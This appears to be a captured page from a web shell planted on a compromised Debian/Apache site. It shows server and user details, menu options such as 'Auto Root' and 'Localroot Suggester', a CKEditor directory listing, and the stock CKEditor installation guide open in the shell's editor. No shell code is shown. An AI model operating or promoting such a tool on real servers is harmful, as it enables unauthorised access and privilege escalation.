Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sites /
all /
libraries /
ckeditor /
Delete
Unzip
Name
Size
Permission
Date
Action
_samples
[ DIR ]
drwxr-sr-x
2010-08-25 04:48
_source
[ DIR ]
drwxr-sr-x
2010-08-25 04:47
adapters
[ DIR ]
drwxr-sr-x
2010-08-25 04:47
images
[ DIR ]
drwxr-sr-x
2010-08-25 04:47
lang
[ DIR ]
drwxr-sr-x
2010-08-25 04:47
plugins
[ DIR ]
drwxr-sr-x
2010-08-25 04:45
skins
[ DIR ]
drwxr-sr-x
2010-08-25 04:45
themes
[ DIR ]
drwxr-sr-x
2010-08-25 04:45
.htaccess
792
B
-rw-r--r--
2017-10-25 14:17
CHANGES.html
75.19
KB
-rw-r--r--
2011-03-03 12:31
INSTALL.html
2.7
KB
-rw-r--r--
2011-03-03 12:32
LICENSE.html
68.17
KB
-rw-r--r--
2011-03-03 12:32
ckeditor.asp
29.16
KB
-rw-r--r--
2011-03-03 12:31
ckeditor.js
308.98
KB
-rw-r--r--
2011-03-03 12:32
ckeditor.pack
7.04
KB
-rw-r--r--
2011-03-03 12:32
ckeditor.php
933
B
-rw-r--r--
2011-03-03 12:32
ckeditor_basic.js
6.56
KB
-rw-r--r--
2011-03-03 12:32
ckeditor_basic_source.js
1.5
KB
-rw-r--r--
2011-03-03 12:32
ckeditor_php4.php
15.03
KB
-rw-r--r--
2011-03-03 12:32
ckeditor_php5.php
15.01
KB
-rw-r--r--
2011-03-03 12:32
ckeditor_source.js
1.57
KB
-rw-r--r--
2011-03-03 12:32
config.js
331
B
-rw-r--r--
2011-03-03 12:32
contents.css
674
B
-rw-r--r--
2011-03-03 12:32
Save
Rename
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright (c) 2003-2010, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://ckeditor.com/license --> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Installation Guide - CKEditor</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <style type="text/css"> h3 { border-bottom: 1px solid #AAAAAA; } pre { background-color: #F9F9F9; border: 1px dashed #2F6FAB; padding: 1em; line-height: 1.1em; } #footer hr { margin: 10px 0 15px 0; height: 1px; border: solid 1px gray; border-bottom: none; } #footer p { margin: 0 10px 10px 10px; float: left; } #footer #copy { float: right; } </style> </head> <body> <h1> CKEditor Installation Guide</h1> <h3> What's CKEditor?</h3> <p> CKEditor is a text editor to be used inside web pages. It's not a replacement for desktop text editors like Word or OpenOffice, but a component to be used as part of web applications and web sites.</p> <h3> Installation</h3> <p> Installing CKEditor is an easy task. Just follow these simple steps:</p> <ol> <li><strong>Download</strong> the latest version of the editor from our web site: <a href="http://ckeditor.com">http://ckeditor.com</a>. You should have already completed this step, but be sure you have the very latest version.</li> <li><strong>Extract</strong> (decompress) the downloaded file into the root of your web site.</li> </ol> <p> <strong>Note:</strong> CKEditor is by default installed in the "ckeditor" folder. You can place the files in whichever you want though.</p> <h3> Checking Your Installation </h3> <p> The editor comes with a few sample pages that can be used to verify that installation proceeded properly. Take a look at the <a href="_samples">_samples</a> directory.</p> <p> To test your installation, just call the following page at your web site:</p> <pre> http://<your site>/<CKEditor installation path>/_samples/index.html For example: http://www.example.com/ckeditor/_samples/index.html</pre> <h3> Documentation</h3> <p> The full editor documentation is available online at the following address:<br /> <a href="http://docs.cksource.com/ckeditor">http://docs.cksource.com/ckeditor</a></p> <div id="footer"> <hr /> <p> CKEditor - The text editor for Internet - <a href="http://ckeditor.com/">http://ckeditor.com</a> </p> <p id="copy"> Copyright © 2003-2010, <a href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved. </p> </div> </body> </html>